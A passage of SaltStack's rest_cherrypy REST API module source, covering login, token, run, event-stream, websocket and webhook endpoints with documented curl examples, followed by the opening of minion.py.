curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token["name"], [])
perms.extend(eauth.get("*", []))
if "groups" in token and token["groups"]:
user_groups = set(token["groups"])
eauth_groups = set(
[i.rstrip("%") for i in eauth.keys() if i.endswith("%")]
)
for group in user_groups & eauth_groups:
perms.extend(eauth["{0}%".format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'.".format(
token.get("eauth"), token.get("name")
),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
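
# Editor's illustrative sketch (not part of the upstream module): the eauth
# permission merge performed in Login.POST, combining '*' perms, per-user
# perms, and group perms (keys ending in '%'). The eauth mapping and token
# below are hypothetical.
def _demo_merge_eauth_perms():
    eauth = {
        "*": ["test.ping"],
        "fred": ["grains.*"],
        "admins%": ["@wheel"],
    }
    token = {"name": "fred", "groups": ["admins", "users"]}

    perms = list(eauth.get(token["name"], []))
    perms.extend(eauth.get("*", []))
    eauth_groups = set(k.rstrip("%") for k in eauth if k.endswith("%"))
    for group in set(token["groups"]) & eauth_groups:
        perms.extend(eauth["{0}%".format(group)])
    # ['grains.*', 'test.ping', '@wheel']
    return perms
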
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`.
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`. Otherwise, this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem. When using salt-ssh, eauth credentials must also be
supplied, and are subject to :ref:`eauth access-control lists <acl>`.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='auto' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
**Example SSH response:**
.. code-block:: text
return:
- silver:
_stamp: '2020-09-08T23:04:28.912609'
fun: test.ping
fun_args: []
id: silver
jid: '20200908230427905565'
retcode: 0
return: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events(object):
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
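    # Editor's note: the hex check above is what lets salt-api session tokens
    # and raw Salt eauth tokens share one validation path; for example,
    # int("308650d", 16) parses, while int("not-a-token", 16) raises
    # ValueError and the token is rejected.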
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
        clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
        Note, the SSE stream is completely asynchronous and Salt is very
        fast. If a job is created using a regular POST request, it is
        possible for the job return to appear on the SSE stream before the
        response to the POST request arrives. It is important to take that
        asynchronicity into account when designing an application. Below are
        some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
yield str("retry: 400\n") # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield str("tag: {0}\n").format(
data.get("tag", "")
) # future lint: disable=blacklisted-function
yield str("data: {0}\n\n").format(
salt.utils.json.dumps(data)
) # future lint: disable=blacklisted-function
return listen()
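
# Editor's illustrative sketch (not part of the upstream module): consuming
# the /events SSE stream from Python with the third-party requests library
# (stream=True avoids buffering, analogous to curl's -N flag). The URL and
# token value are hypothetical.
def _demo_consume_events():
    import json

    import requests

    resp = requests.get(
        "http://localhost:8000/events?token=308650d", stream=True
    )
    for line in resp.iter_lines(decode_unicode=True):
        if line and line.startswith("data: "):
            event = json.loads(line[len("data: "):])
            print(event.get("tag"), event.get("data"))
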
class WebsocketEndpoint(object):
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
            var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
        The examples above show how to establish a websocket connection to
        Salt and activate real-time updates from Salt's event stream by
        signaling ``websocket client ready``.
"""
        # Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
str("data: {0}\n\n").format(
salt.utils.json.dumps(data)
), # future lint: disable=blacklisted-function
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}".format(data)
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
            # lowdata formatting is applied to the POST data (see
            # lowdata_fmt above)
            "tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
                  revision: {{ build.revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats(object):
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
        .. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API(object):
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
minion.py
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import multiprocessing
from random import randint, shuffle
from salt.config import DEFAULT_MINION_OPTS
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'syndic_master\' value in minion config.'.format(master)
            else:
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
